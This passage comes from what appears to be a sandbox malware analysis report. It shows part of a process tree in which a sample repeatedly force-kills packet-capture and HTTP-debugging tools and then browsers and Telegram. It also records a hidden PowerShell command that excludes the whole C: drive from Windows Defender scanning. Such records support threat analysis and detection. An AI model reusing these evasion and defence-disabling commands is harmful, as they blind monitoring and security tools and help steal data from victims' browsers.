        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:64
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:5052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1952
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4832
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        Kills process with taskkill
        
        PID:1936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:5096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3120
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:5084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:64
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2584
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3376
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3492
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:2284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:816
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1608
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        Kills process with taskkill
        
        PID:5052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:316
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:5068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:5112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4396
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4192
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:5020
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3672
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4204
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2240
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2496
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:516
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:5112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:2940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4308
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4588
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3848
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3184
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:1748
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:1016
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:4288
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:5096
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:4924
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:2684
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:3088
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:4744
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3968
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:4528
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:1948
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1016
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:2644
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:5096
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:4136
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:4732
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:4224
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5024
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:516
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:3356
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:4860
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:440
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:636
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3344
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:2748
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:2604
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:2904
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:2412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:1144
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:4628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:3552
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:1384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:4860
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:4872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:4964
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5036
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        
        PID:2240
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:4924
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1348
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        
        PID:1756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:1400
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        
        PID:4388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:2148
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        
        PID:1732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:3220
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        
        PID:4628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:2764
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:2016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:5012
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:4196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:4764
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:4416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:948
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3868
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:3992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:3088
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        
        PID:4856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:3172
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        
        PID:1408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:4884
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        
        PID:3716
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:4828
      - C:\Windows\system32\taskkill.exe
        
